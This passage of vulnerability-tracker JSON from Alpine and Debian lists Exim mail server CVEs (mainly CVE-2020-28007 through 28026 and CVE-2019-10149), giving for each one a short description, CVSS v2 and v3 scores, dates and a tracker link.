"2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28021"], "modified": "2021-05-10T16:23:00", "id": "ALPINE:CVE-2020-28021", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28021", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T14:29:00", "type": "alpinelinux", "title": "CVE-2019-10149", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-11-07T19:12:00", "id": "ALPINE:CVE-2019-10149", "href": "https://security.alpinelinux.org/vuln/CVE-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28010", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28010"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28010", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28010", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28023", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28023"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28023", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer. This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28022"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28022", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker can execute arbitrary code by leveraging the mishandling of continuation lines during header-length restriction.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28020", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28020"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28020", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28020", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28008", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28008"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28008", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28008", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because \"-F ''\" is mishandled by parse_fix_phrase.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28016", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28016"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28016", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28009", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28009"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28009", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28009", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles \"-F '.('\" on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28013"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28013", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28013", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28019", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28019", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28024", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28024"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28024", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28014", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28014"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28014", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28014", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28021"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28021", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28021", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28012", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28012"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28012", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28012", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S. This may cause privilege escalation from exim to root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28011", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28011"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28011", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28011", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28025", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28025"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28025", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28025", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28018", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28018", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28007", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28007", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28007", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28026", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 